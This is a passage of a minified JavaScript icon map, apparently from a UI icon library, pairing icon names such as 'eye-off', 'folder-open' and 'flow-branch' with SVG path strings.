.45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zM6 5c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1z"],"drag-handle-vertical":["M6 9c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm4-6c.55 0 1-.45 1-1s-.45-1-1-1-1 .45-1 1 .45 1 1 1zM6 13c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm0-8c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm0-4c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm4 8c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm0-4c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm0 8c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1z"],draw:["M14.9 11c-.3 0-.5.1-.7.3l-3 3c-.2.2-.3.4-.3.7 0 .6.5 1 1 1 .3 0 .5-.1.7-.3l3-3c.2-.2.3-.4.3-.7 0-.5-.4-1-1-1zm-1-1v-.2l-1-5c-.1-.3-.3-.6-.6-.7l-11-4-.3.3 5.8 5.8c.2-.1.4-.2.6-.2.8 0 1.5.7 1.5 1.5S8.3 9 7.4 9s-1.5-.7-1.5-1.5c0-.2.1-.4.2-.6L.3 1.1l-.3.3 4 11c.1.3.4.6.7.6l5 1h.2c.3 0 .5-.1.7-.3l3-3c.2-.2.3-.4.3-.7z"],"drive-time":["M15.12 4.76h-1.05l-.76-2.12c-.19-.53-.76-1.08-1.27-1.24 0 0-1.32-.4-4.04-.4-2.72 0-4.04.4-4.04.4-.5.16-1.07.71-1.26 1.24l-.77 2.12H.88c-.48 0-.88.42-.88.94s.4.94.88.94h.38L1 7c-.03.69 0 1.44 0 2v5c0 .66.38 1 1 1s1-.34 1-1v-1h10v1c0 .66.38 1 1 1s1-.34 1-1V9c0-.56-.01-1.37 0-2l-.26-.37h.38c.48 0 .88-.42.88-.93 0-.52-.4-.94-.88-.94zM5 10H3V8h2v2zm8 0h-2V8h2v2zm0-4H3c-.18 0-.06-.82 0-1l.73-1.63C3.79 3.19 3.82 3 4 3h8c.18 0 .21.19.27.37L13 5c.06.18.18 1 0 1z"],duplicate:["M15 0H5c-.55 0-1 .45-1 1v2h2V2h8v7h-1v2h2c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-4 4H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zm-1 10H2V6h8v8z"],edit:["M3.25 10.26l2.47 2.47 6.69-6.69-2.46-2.48-6.7 6.7zM.99 14.99l3.86-1.39-2.46-2.44-1.4 3.83zm12.25-14c-.48 0-.92.2-1.24.51l-1.44 1.44 2.47 2.47 1.44-1.44c.32-.32.51-.75.51-1.24.01-.95-.77-1.74-1.74-1.74z"],eject:["M4 9h8a1.003 1.003 0 0 0 .71-1.71l-4-4C8.53 3.11 8.28 3 8 3s-.53.11-.71.29l-4 4A1.003 1.003 0 0 0 4 9zm8 1H4c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h8c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1z"],endorsed:["M15.86 7.5l-.81-1.42V4.5c0-.36-.19-.68-.49-.87l-1.37-.8-.81-1.41c-.19-.31-.51-.49-.86-.49H9.89L8.5.14a.948.948 0 0 0-1 0l-1.39.8H4.52a1 1 0 0 0-.86.49l-.8 1.37-1.44.83c-.3.19-.49.51-.49.87v1.65l-.8 1.37c-.08.15-.13.32-.13.49s.05.34.14.49l.8 1.37v1.65c0 .36.19.68.49.87l1.42.81.8 1.37c.19.31.51.49.86.49H6.1l1.39.8c.15.09.32.14.48.14s.34-.05.49-.14l1.39-.8h1.63a1 1 0 0 0 .86-.49l.81-1.41 1.37-.8c.3-.19.49-.51.49-.87V9.93l.81-1.42a.89.89 0 0 0 .04-1.01zm-4.12-.82l-4.01 4.01c-.18.18-.43.29-.71.29s-.53-.11-.71-.29l-2-2c-.18-.19-.3-.44-.3-.71a1.003 1.003 0 0 1 1.71-.71l1.3 1.3 3.3-3.3a1.003 1.003 0 0 1 1.71.71.95.95 0 0 1-.29.7z"],envelope:["M0 3.06v9.88L4.94 8 0 3.06zM14.94 2H1.06L8 8.94 14.94 2zm-6.41 8.53c-.14.14-.32.22-.53.22s-.39-.08-.53-.22L6 9.06 1.06 14h13.88L10 9.06l-1.47 1.47zM11.06 8L16 12.94V3.06L11.06 8z"],eraser:["M8.06 13.91l7.63-7.44c.41-.4.41-1.05 0-1.45L10.86.3c-.41-.4-1.08-.4-1.49 0L.31 9.13c-.41.4-.41 1.05 0 1.45l5.58 5.44h8.12v-.01c.55 0 1-.45 1-1s-.45-1-1-1H7.96l.1-.1zm-2.17.06L1.67 9.85l4.22-4.11 4.22 4.11-4.22 4.12z"],error:["M7.99-.01c-4.42 0-8 3.58-8 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm1 13h-2v-2h2v2zm0-3h-2v-7h2v7z"],euro:["M6.52 3.18c.51-.27 1.12-.4 1.83-.4.48 0 .91.06 1.27.18.37.12.68.29.96.51.18.14.3.33.44.51l1.53-1.53c-.12-.11-.23-.22-.36-.32a5.61 5.61 0 0 0-1.74-.83c-.66-.2-1.36-.3-2.1-.3-.99 0-1.88.18-2.66.53-.79.35-1.45.82-2 1.41-.55.58-.96 1.27-1.26 2.06H2c-.55 0-1 .45-1 1s.45 1 1 1h.04c-.01.17-.04.33-.04.5 0 .17.03.33.04.5H2c-.55 0-1 .45-1 1s.45 1 1 1h.43c0 .01 0 .02.01.02a6.2 6.2 0 0 0 1.25 2.07 5.77 5.77 0 0 0 2 1.4c.78.34 1.67.51 2.66.51.81 0 1.54-.12 2.21-.36.67-.24 1.25-.59 1.75-1.03l.03-.03-1.55-1.33c-.01.01-.02.03-.03.04-.29.3-.63.53-1.02.69-.4.17-.85.25-1.37.25-.71 0-1.32-.13-1.83-.4s-.93-.62-1.25-1.07c-.19-.24-.34-.49-.46-.76H9c.55 0 1-.45 1-1s-.45-1-1-1H4.35c-.01-.17-.03-.33-.03-.5 0-.17.02-.34.03-.5H10c.55 0 1-.45 1-1s-.45-1-1-1H4.83c.13-.27.27-.52.44-.76.32-.44.74-.8 1.25-1.06zM14 8.98v0z"],exchange:["M1.99 5.99c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.89-2-2-2zm4.15 1.86a.495.495 0 1 0 .7-.7L5.7 5.99h5.79c.28 0 .5-.22.5-.5s-.22-.5-.5-.5H5.7l1.15-1.15a.495.495 0 1 0-.7-.7l-2 2c-.1.09-.16.21-.16.35s.06.26.15.35l2 2.01zm7.85-1.86c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.89-2-2-2zM9.85 8.14a.533.533 0 0 0-.36-.15.495.495 0 0 0-.35.85l1.15 1.15h-5.8c-.28 0-.5.22-.5.5s.22.5.5.5h5.79l-1.15 1.15a.495.495 0 1 0 .7.7l2-2c.09-.09.15-.22.15-.35s-.06-.26-.15-.35l-1.98-2z"],"exclude-row":["M0 10a1.003 1.003 0 0 0 1.71.71L3 9.41l1.29 1.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L4.41 8 5.7 6.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L3 6.59l-1.29-1.3A1.003 1.003 0 0 0 .29 6.71L1.59 8 .29 9.29C.11 9.47 0 9.72 0 10zm1-7h14c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm14 10H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm-1-7H9c-1.1 0-2 .9-2 2s.9 2 2 2h5c1.1 0 2-.9 2-2s-.9-2-2-2z"],"expand-all":["M4 7c.28 0 .53-.11.71-.29L8 3.41l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-4-4C8.53 1.11 8.28 1 8 1s-.53.11-.71.29l-4 4A1.003 1.003 0 0 0 4 7zm8 2c-.28 0-.53.11-.71.29L8 12.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42l4 4c.18.18.43.29.71.29s.53-.11.71-.29l4-4A1.003 1.003 0 0 0 12 9z"],export:["M4 6c.28 0 .53-.11.71-.29L7 3.41V11c0 .55.45 1 1 1s1-.45 1-1V3.41l2.29 2.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-4-4C8.53.11 8.28 0 8 0s-.53.11-.71.29l-4 4A1.003 1.003 0 0 0 4 6zm11 5c-.55 0-1 .45-1 1v2H2v-2c0-.55-.45-1-1-1s-1 .45-1 1v3c0 .55.45 1 1 1h14c.55 0 1-.45 1-1v-3c0-.55-.45-1-1-1z"],"eye-off":["M16 7.97v-.02-.01-.02-.02a.672.672 0 0 0-.17-.36c-.49-.63-1.07-1.2-1.65-1.72l-3.16 2.26a2.978 2.978 0 0 1-2.98 2.9c-.31 0-.6-.06-.88-.15L5.09 12.3c.44.19.9.36 1.37.47.97.23 1.94.24 2.92.05.88-.17 1.74-.54 2.53-.98 1.25-.7 2.39-1.67 3.38-2.75.18-.2.37-.41.53-.62.09-.1.15-.22.17-.36v-.02-.02-.01-.02-.03c.01-.02.01-.03.01-.04zm-.43-4.17c.25-.18.43-.46.43-.8 0-.55-.45-1-1-1-.22 0-.41.08-.57.2l-.01-.01-2.67 1.91c-.69-.38-1.41-.69-2.17-.87a6.8 6.8 0 0 0-2.91-.05c-.88.18-1.74.54-2.53.99-1.25.7-2.39 1.67-3.38 2.75-.18.2-.37.41-.53.62-.23.29-.23.63-.01.92.51.66 1.11 1.25 1.73 1.79.18.16.38.29.56.44l-2.09 1.5.01.01c-.25.18-.43.46-.43.8 0 .55.45 1 1 1 .22 0 .41-.08.57-.2l.01.01 14-10-.01-.01zm-10.41 5a3.03 3.03 0 0 1-.11-.8 2.99 2.99 0 0 1 2.99-2.98c.62 0 1.19.21 1.66.53L5.16 8.8z"],"eye-on":["M10.29 6.7c.18.18.43.29.71.29s.53-.11.71-.29l4-4c.17-.18.29-.43.29-.7a1.003 1.003 0 0 0-1.71-.71L11 4.58 9.71 3.29A.997.997 0 0 0 9 3c-.55 0-1 .44-1 1a1 1 0 0 0 .3.7l1.99 2zM16 7.96v-.02-.01-.02-.02a.64.64 0 0 0-.17-.36c-.3-.4-.65-.76-1-1.12l-1.7 1.7c-.55.55-1.3.88-2.13.88-.06 0-.11-.01-.17-.02C10.42 10.15 9.32 11 8.01 11A3.005 3.005 0 0 1 6.4 5.46c-.24-.43-.39-.93-.39-1.46 0-.26.04-.5.1-.74-.7.2-1.37.5-2.01.86-1.26.7-2.4 1.68-3.4 2.77-.18.21-.36.41-.53.63-.22.29-.22.64 0 .93.51.67 1.12 1.27 1.73 1.81 1.33 1.17 2.85 2.15 4.53 2.55.97.23 1.95.24 2.92.05.89-.18 1.74-.54 2.54-.99 1.25-.71 2.4-1.69 3.39-2.78.18-.2.37-.41.54-.63.09-.1.15-.23.17-.37v-.02-.02-.01-.02-.03c.01-.01.01-.02.01-.03zM8.01 9c.48 0 .87-.35.96-.81a.55.55 0 0 1-.07-.09l-.02.01L7.8 7.03c-.45.1-.79.48-.79.96 0 .56.45 1.01 1 1.01z"],"eye-open":["M8.002 7.003a1.003 1.003 0 0 0 0 2.005 1.003 1.003 0 0 0 0-2.005zm7.988.972v-.02-.01-.02-.02a.675.675 0 0 0-.17-.36c-.509-.673-1.118-1.264-1.737-1.806-1.328-1.173-2.846-2.155-4.523-2.546a6.702 6.702 0 0 0-2.925-.06c-.889.18-1.738.541-2.546.992C2.84 4.837 1.692 5.81.694 6.902c-.18.211-.36.411-.53.632a.742.742 0 0 0 0 .932c.51.672 1.119 1.264 1.738 1.805 1.328 1.173 2.846 2.156 4.523 2.547.968.23 1.947.24 2.925.04.889-.18 1.738-.542 2.546-.993 1.248-.712 2.397-1.684 3.395-2.777.18-.2.37-.411.54-.632.09-.1.149-.23.169-.36v-.02-.02-.01-.02-.03c0-.01-.01-.01-.01-.02zm-7.988 3.038a2.998 2.998 0 0 1-2.995-3.008 2.998 2.998 0 0 1 2.995-3.008 2.998 2.998 0 0 1 2.996 3.008 2.998 2.998 0 0 1-2.996 3.008z"],"fast-backward":["M14 3c-.24 0-.44.09-.62.23l-.01-.01L9 6.72V4c0-.55-.45-1-1-1-.24 0-.44.09-.62.23v-.01l-5 4 .01.01C2.16 7.41 2 7.68 2 8s.16.59.38.77v.01l5 4 .01-.01c.17.14.37.23.61.23.55 0 1-.45 1-1V9.28l4.38 3.5.01-.01c.17.14.37.23.61.23.55 0 1-.45 1-1V4c0-.55-.45-1-1-1z"],"fast-forward":["M15 8c0-.32-.16-.59-.38-.77l.01-.01-5-4-.01.01A.987.987 0 0 0 9 3c-.55 0-1 .45-1 1v2.72l-4.38-3.5v.01A.987.987 0 0 0 3 3c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1 .24 0 .44-.09.62-.23l.01.01L8 9.28V12c0 .55.45 1 1 1 .24 0 .44-.09.62-.23l.01.01 5-4-.01-.01c.22-.18.38-.45.38-.77z"],feed:["M1.99 11.99c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.89-2-2-2zm1-4c-.55 0-1 .45-1 1s.45 1 1 1c1.66 0 3 1.34 3 3 0 .55.45 1 1 1s1-.45 1-1c0-2.76-2.24-5-5-5zm0-4c-.55 0-1 .45-1 1s.45 1 1 1c3.87 0 7 3.13 7 7 0 .55.45 1 1 1s1-.45 1-1a9 9 0 0 0-9-9zm0-4c-.55 0-1 .45-1 1s.45 1 1 1c6.08 0 11 4.92 11 11 0 .55.45 1 1 1s1-.45 1-1c0-7.18-5.82-13-13-13z"],"feed-subscribed":["M3 2c1.06 0 2.08.16 3.06.45.13-.71.52-1.32 1.05-1.76C5.82.25 4.44 0 3 0c-.55 0-1 .45-1 1s.45 1 1 1zM2 12c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm8.32-6.33a.99.99 0 0 0 1.4 0l3.98-3.98c.19-.18.3-.42.3-.7 0-.55-.45-.99-1-.99-.28 0-.52.11-.7.29l-3.28 3.28-1.29-1.29a.99.99 0 0 0-.7-.29 1 1 0 0 0-1 .99c0 .27.11.52.29.7l2 1.99zm3.73.53l-.93.93-.02-.02c-.17.17-.35.33-.56.45C13.47 9.16 14 11.02 14 13c0 .55.45 1 1 1s1-.45 1-1c0-2.5-.73-4.82-1.95-6.8zM3 8c-.55 0-1 .45-1 1s.45 1 1 1c1.66 0 3 1.34 3 3 0 .55.45 1 1 1s1-.45 1-1c0-2.76-2.24-5-5-5zm5.91-.91l-.03.03-2-2 .03-.03c-.11-.11-.23-.2-.33-.33A8.9 8.9 0 0 0 3 4c-.55 0-1 .45-1 1s.45 1 1 1c3.87 0 7 3.13 7 7 0 .55.45 1 1 1s1-.45 1-1c0-1.87-.57-3.61-1.55-5.06-.61-.11-1.13-.42-1.54-.85z"],film:["M15 1h-5v2H6V1H1c-.55 0-1 .45-1 1v11c0 .55.45 1 1 1h5v-2h4v2h5c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zM4 13H2v-2h2v2zm0-3H2V8h2v2zm0-3H2V5h2v2zm0-3H2V2h2v2zm6 6H6V5h4v5zm4 3h-2v-2h2v2zm0-3h-2V8h2v2zm0-3h-2V5h2v2zm0-3h-2V2h2v2z"],filter:["M13.99.99h-12a1.003 1.003 0 0 0-.71 1.71l4.71 4.71V14a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71V7.41L14.7 2.7a1.003 1.003 0 0 0-.71-1.71z"],"filter-keep":["M15 10c-.28 0-.53.11-.71.29L12 12.59l-1.29-1.29A.965.965 0 0 0 10 11a1.003 1.003 0 0 0-.71 1.71l2 2c.18.18.43.29.71.29s.53-.11.71-.29l3-3A1.003 1.003 0 0 0 15 10zm-3-8c0-.55-.45-1-1-1H1a1.003 1.003 0 0 0-.71 1.71L4 6.41V12a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71V6.41l3.71-3.71c.18-.17.29-.42.29-.7z"],"filter-list":["M9 8c0 .55.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1h-5c-.55 0-1 .45-1 1zm3-6c0-.55-.45-1-1-1H1a1.003 1.003 0 0 0-.71 1.71L4 6.41V12a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71V6.41l3.71-3.71c.18-.17.29-.42.29-.7zm3 8h-5c-.55 0-1 .45-1 1s.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1zm0 3h-5c-.55 0-1 .45-1 1s.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1z"],"filter-remove":["M12 2c0-.55-.45-1-1-1H1a1.003 1.003 0 0 0-.71 1.71L4 6.41V12a1.003 1.003 0 0 0 1.71.71l2-2c.18-.18.29-.43.29-.71V6.41l3.71-3.71c.18-.17.29-.42.29-.7zm2.41 10l1.29-1.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L13 10.59 11.71 9.3A.965.965 0 0 0 11 9a1.003 1.003 0 0 0-.71 1.71l1.3 1.29-1.29 1.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l1.29-1.3 1.29 1.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L14.41 12z"],flag:["M2.99 2.99c-.55 0-1 .45-1 1v11c0 .55.45 1 1 1s1-.45 1-1v-11c0-.55-.45-1-1-1zm0-3c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm2 3.03v7.23c2.07-2.11 5.92 1.75 9 0V3.02c-3 2.07-6.94-2.03-9 0z"],flame:["M9.217 0c0 1.368.368 2.462 1.104 3.282C12.774 5.197 14 7.385 14 9.846c0 2.735-1.472 4.786-4.415 6.154 2.165-2.4 1.84-3.385-.368-6.4-2.342 1.2-1.967 2-1.592 3.6-.786 0-1.5 0-1.875-.4 0 .547.898 2 1.464 3.2-2.943-.82-6.092-5.744-4.988-6.154.736-.273 1.594-.137 2.575.41C3.575 5.333 5.047 1.915 9.217 0z"],flash:["M4 8c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1h2c.55 0 1-.45 1-1zm4-4c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1S7 .45 7 1v2c0 .55.45 1 1 1zM3.79 5.21a1.003 1.003 0 0 0 1.42-1.42l-1.5-1.5a1.003 1.003 0 0 0-1.42 1.42l1.5 1.5zm.71 5.29c-.28 0-.53.11-.71.29l-1.5 1.5a1.003 1.003 0 0 0 1.42 1.42l1.5-1.5a1.003 1.003 0 0 0-.71-1.71zm7-5c.28 0 .53-.11.71-.29l1.5-1.5a1.003 1.003 0 0 0-1.42-1.42l-1.5 1.5a1.003 1.003 0 0 0 .71 1.71zm.71 5.29a1.003 1.003 0 0 0-1.42 1.42l1.5 1.5a1.003 1.003 0 0 0 1.42-1.42l-1.5-1.5zM15 7h-2c-.55 0-1 .45-1 1s.45 1 1 1h2c.55 0 1-.45 1-1s-.45-1-1-1zM8 5C6.34 5 5 6.34 5 8s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3zm0 4c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm0 3c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1s1-.45 1-1v-2c0-.55-.45-1-1-1z"],"floppy-disk":["M15.71 2.29l-2-2A.997.997 0 0 0 13 0h-1v6H4V0H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V3c0-.28-.11-.53-.29-.71zM14 15H2V9c0-.55.45-1 1-1h10c.55 0 1 .45 1 1v6zM11 1H9v4h2V1z"],"flow-branch":["M10.643 6.595c.22.418.344.894.344 1.399 0 .439-.094.855-.263 1.231l3.265 3.462-.002-1.75a.973.973 0 0 1 .314-.68.99.99 0 0 1 1.388.048c.186.2.316.46.3.715l-.009 4.03a.959.959 0 0 1-.3.68.972.972 0 0 1-.698.266l-4.053.002a.97.97 0 0 1-.679-.314 1.031 1.031 0 0 1 .05-1.42.972.972 0 0 1 .698-.266l1.7-.001-3.305-3.35a2.998 2.998 0 0 1-4.228-1.653H.999a1 1 0 0 1 0-2h4.166a2.998 2.998 0 0 1 4.06-1.735l3.449-3.268-1.745.002a.979.979 0 0 1-.631-1.692c.199-.186.459-.316.713-.3l4.025.009c.247.008.493.1.679.3.186.2.274.451.265.7l.002 4.046a.972.972 0 0 1-.313.68 1.03 1.03 0 0 1-1.42-.05.973.973 0 0 1-.266-.7V3.295l-3.34 3.301z"],"flow-end":["M9.702 7.31c.176.176.293.41.293.684a.976.976 0 0 1-.283.695c-1.888 1.91-2.892 2.918-3.011 3.027-.179.164-.42.284-.693.284a.995.995 0 0 1-.997-.985c0-.274.112-.541.292-.72.12-.12.624-.551 1.514-1.293H.98c-.536 0-.975-.47-.975-1.008 0-.537.439-.996.975-.996h5.837c-.895-.752-1.4-1.187-1.514-1.304a1.03 1.03 0 0 1-.292-.705C5.01 4.45 5.464 4 6 4c.272 0 .52.108.695.294A535.7 535.7 0 0 0 9.702 7.31zM13 11.002c-1.657 0-3-1.347-3-3.008a3.004 3.004 0 0 1 3-3.007c1.657 0 3 1.346 3 3.007a3.004 3.004 0 0 1-3 3.008z"],"flow-linear":["M4.16 9.002H.977C.44 9.002 0 8.532 0 7.994c0-.537.44-.99.978-.99h3.18A3.01 3.01 0 0 1 6.995 5a3.01 3.01 0 0 1 2.839 2.004h2.98c-.898-.756-1.404-1.193-1.518-1.31a1.03 1.03 0 0 1-.293-.705c0-.538.454-.989.992-.989.274 0 .521.108.697.294.118.124 1.122 1.13 3.014 3.016a.96.96 0 0 1 .293.684.975.975 0 0 1-.284.695l-3.018 3.027a.974.974 0 0 1-.694.284c-.553 0-1-.447-1-.985 0-.274.117-.545.293-.72l1.518-1.293H9.833A3.01 3.01 0 0 1 6.996 11 3.01 3.01 0 0 1 4.16 9.002z"],"flow-review":["M5.175 7.004a3.003 3.003 0 0 1 2.83-2.001c1.305 0 2.416.835 2.83 2.001h1.985c-.896-.756-1.401-1.193-1.515-1.31a1.03 1.03 0 0 1-.292-.705c0-.538.453-.989.99-.989a.95.95 0 0 1 .696.294c.117.124 1.12 1.13 3.008 3.016.176.176.293.41.293.684a.976.976 0 0 1-.283.695l-3.013 3.027a.995.995 0 0 1-1.691-.702c0-.273.116-.544.292-.72l1.515-1.292h-1.98a3.003 3.003 0 0 1-2.835 2.016A3.003 3.003 0 0 1 5.17 9.002H3.18l1.515 1.292c.176.176.292.447.292.72a.995.995 0 0 1-1.69.702L.282 8.69A.976.976 0 0 1 0 7.994c0-.273.117-.508.293-.684A535.858 535.858 0 0 0 3.3 4.294.95.95 0 0 1 3.997 4c.537 0 .99.45.99.989 0 .273-.12.528-.292.705-.114.117-.62.554-1.515 1.31h1.995z"],"flow-review-branch":["M10.392 10.647A3.002 3.002 0 0 1 6.16 8.995H3.37l1.338 1.318c.172.178.287.41.282.683-.01.536-.524.995-.99.995-.465 0-.63-.187-.747-.294L.281 8.682A.956.956 0 0 1 0 7.994a.971.971 0 0 1 .294-.687l3.01-3.028a.973.973 0 0 1 .697-.27c.536.01.998.485.989 1.021a.971.971 0 0 1-.295.687L3.37 6.997h2.79a3.002 3.002 0 0 1 4.106-1.716l2.416-2.277-1.732.004a.99.99 0 0 1-.679-.329.978.978 0 0 1 .05-1.378c.199-.186.459-.315.714-.3l4.012.005c.248.009.493.1.68.3.185.2.273.45.264.699L15.99 6.05a.973.973 0 0 1-.314.679 1.03 1.03 0 0 1-1.421-.048.971.971 0 0 1-.265-.699V4.29L11.65 6.602c.219.416.343.89.343 1.394 0 .451-.1.88-.279 1.263L14 11.68l-.004-1.73a.982.982 0 0 1 .323-.68.978.978 0 0 1 1.378.049c.187.2.316.46.3.714l-.004 4.011a.983.983 0 0 1-.3.691.972.972 0 0 1-.7.265l-4.046-.001a.987.987 0 0 1-.679-.326 1.017 1.017 0 0 1 .048-1.41.972.972 0 0 1 .699-.265h1.693l-2.315-2.35z"],flows:["M13.5 6a2.5 2.5 0 0 0-2.45 2h-1.3L5.74 4l-.75.75L8.25 8h-3.3a2.5 2.5 0 1 0 0 1h3.3l-3.26 3.25.75.75 4.01-4h1.3a2.5 2.5 0 1 0 2.45-3z"],"folder-close":["M-.01 14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V7h-16v7zm15-10H7.41L5.7 2.3a.965.965 0 0 0-.71-.3h-4c-.55 0-1 .45-1 1v3h16V5c0-.55-.45-1-1-1z"],"folder-new":["M10.165 7a3.003 3.003 0 0 0 2.827 2 3.003 3.003 0 0 0 2.827-2H16v7c0 .55-.45 1-1 1H1.01c-.55 0-1-.45-1-1V7h10.155zM8.76 6H0V3c0-.55.45-1 1-1h1.998c.28 0 .53.11.71.29L5.417 4h2.578c0 .768.29 1.469.765 2zm6.23-3c.55 0 1 .45 1 1s-.45 1-1 1h-.999v1c0 .55-.45 1-1 1-.549 0-.998-.45-.998-1V5h-1c-.55 0-1-.45-1-1s.45-1 1-1h1V2c0-.55.45-1 .999-1 .55 0 1 .45 1 1v1h.999z"],"folder-open":["M2.06 6.69c.14-.4.5-.69.94-.69h11V5c0-.55-.45-1-1-1H6.41l-1.7-1.71A.997.997 0 0 0 4 2H1c-.55 0-1 .45-1 1v9.84l2.05-6.15h.01zM16 8c0-.55-.45-1-1-1H4a.99.99 0 0 0-.94.69l-2 6c-.04.09-.06.2-.06.31 0 .55.45 1 1 1h11c.44 0 .81-.29.94-.69l2-6c.04-.09.06-.2.06-.31z"],"folder-shared":["M8.76 5.98c-.47-.53-.77-1.22-.77-1.99h-.58L5.7 2.29a.965.965 0 0 0-.71-.3h-4c-.55 0-1 .45-1 1v3h8.76l.01-.01zm6.23-2.99h-4c-.55 0-1 .45-1 1s.45 1 1 1h1.59l-3.3 3.3a.99.99 0 0 0-.29.7 1.003 1.003 0 0 0 1.71.71l3.29-3.29V8c0 .55.45 1 1 1s1-.45 1-1V4c0-.56-.45-1.01-1-1.01zm-1.98 7.23l-.9.9-.01-.01c-.54.55-1.28.89-2.11.89-1.66 0-3-1.34-3-3 0-.77.3-1.47.78-2H-.01v7c0 .55.45 1 1 1h14c.55 0 1-.45 1-1v-3.18c-.31.11-.65.18-1 .18-.76-.01-1.45-.31-1.98-.78z"],"folder-shared-open":["M13.02 10.22l-.9.9-.01-.01c-.54.55-1.28.89-2.11.89-1.66 0-3-1.34-3-3 0-.77.3-1.47.78-2H4a.99.99 0 0 0-.94.69l-2 6c-.04.09-.06.2-.06.31 0 .55.45 1 1 1h11c.44 0 .81-.29.94-.69l1.11-3.32c-.01 0-.03.01-.05.01-.77 0-1.45-.3-1.98-.78zM2.06 6.69c.14-.4.5-.69.94-.69h5.76l.01-.01C8.3 5.46 8 4.77 8 4H6.41l-1.7-1.71A.997.997 0 0 0 4 2H1c-.55 0-1 .45-1 1v9.84l2.05-6.15h.01zM15 3h-4c-.55 0-1 .45-1 1s.45 1 1 1h1.59l-3.3 3.29a1.003 1.003 0 0 0 1.42 1.42L14 6.41V8c0 .55.45 1 1 1s1-.45 1-1V4c0-.55-.45-1-1-1z"],follower:["M9.37 12.69c-1.2-.53-1.04-.85-1.08-1.29-.01-.06-.01-.12-.01-.19.41-.37.75-.87.97-1.44 0 0 .01-.03.01-.04.05-.13.09-.26.12-.39.28-.06.44-.36.5-.63.06-.11.19-.39.16-.7-.04-.4-.2-.59-.38-.67v-.07c0-.52-.05-1.26-.14-1.74a2.72 2.72 0 0 0-.09-.43 3.02 3.02 0 0 0-1.04-1.51C7.87 3.2 7.15 3 6.5 3c-.64 0-1.36.2-1.87.59-.5.38-.87.92-1.05 1.51-.04.13-.07.27-.09.4-.09.49-.14 1.24-.14 1.75v.06c-.19.07-.36.26-.4.68-.03.31.1.59.16.7.06.28.23.59.51.64.04.14.08.27.13.39 0 .01.01.02.01.02v.01c.22.59.57 1.1.99 1.46 0 .06-.01.12-.01.17-.04.44.08.76-1.12 1.29-1.2.53-3.01 1.1-3.38 1.95C-.13 15.5.02 16 .02 16h12.96s.15-.5-.22-1.36c-.38-.85-2.19-1.42-3.39-1.95zm6.33-10.4l-2-2a1.003 1.003 0 0 0-1.42 1.42l.3.29H9.99c-.55 0-1 .45-1 1s.45 1 1 1h2.58l-.29.29a1.003 1.003 0 0 0 1.42 1.42l2-2c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],following:["M9.37 12.69c-1.2-.53-1.04-.85-1.08-1.29-.01-.06-.01-.12-.01-.19.41-.37.75-.87.97-1.44 0 0 .01-.03.01-.04.05-.13.09-.26.12-.39.28-.06.44-.36.5-.63.06-.11.19-.39.16-.7-.04-.4-.2-.59-.38-.67v-.07c0-.52-.05-1.26-.14-1.74a2.72 2.72 0 0 0-.09-.43 3.02 3.02 0 0 0-1.04-1.51C7.87 3.2 7.15 3 6.5 3c-.64 0-1.36.2-1.87.59-.5.38-.87.92-1.05 1.51-.04.13-.07.27-.09.4-.09.49-.14 1.24-.14 1.75v.06c-.19.07-.36.26-.4.68-.03.31.1.59.16.7.06.28.23.59.51.64.04.14.08.27.13.39 0 .01.01.02.01.02v.01c.22.59.57 1.1.99 1.46 0 .06-.01.12-.01.17-.04.44.08.76-1.12 1.29-1.2.53-3.01 1.1-3.38 1.95C-.13 15.5.02 16 .02 